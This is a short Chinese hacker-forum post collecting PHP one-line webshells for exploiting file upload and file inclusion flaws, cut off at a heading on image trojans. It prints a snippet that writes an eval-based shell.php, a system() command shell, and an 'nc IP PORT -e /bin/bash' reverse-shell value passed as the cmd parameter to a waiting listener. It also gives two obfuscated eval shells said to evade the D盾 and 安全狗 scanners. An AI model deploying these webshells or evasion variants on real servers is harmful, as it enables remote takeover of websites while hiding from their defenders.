[漏洞利用] 【漏洞利用】文件上传漏洞&文件包含漏洞利用

552 0
Honkers 2026-1-3 05:15:06 来自手机 | 显示全部楼层 |阅读模式

一句话木马汇总

GitHub

中国蚁剑项目

PHP一句话

  1. 在服务端生成内容为一句话木马的shell.php文件,结合php://input使用。
  1. <?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"];?>');?>`
复制代码
  1. 将“nc IP PORT -e /bin/bash”作为cmd参数的值传递给服务端,攻击机开启nc监听模式。
  1. <?php system($_GET["cmd"]) ?>
复制代码

静态免杀PHP一句话

  1. 可绕过D盾,D盾对于eval中是否包含$比较敏感。
  1. <?php
  2. function a()
  3. {
  4. return "/*asdas*/".$_POST['a'];
  5. }
  6. eval(a());
  7. ?>
复制代码
  1. 可以绕过D盾和安全狗。
  1. <?php
  2. ob_start();
  3. echo "/*sdjmz*/".$_GET["id"];
  4. eval(ob_get_contents());
  5. ob_flush();
  6. ?>
复制代码

文件上传绕过

图片马制作

cmd<

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2026 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行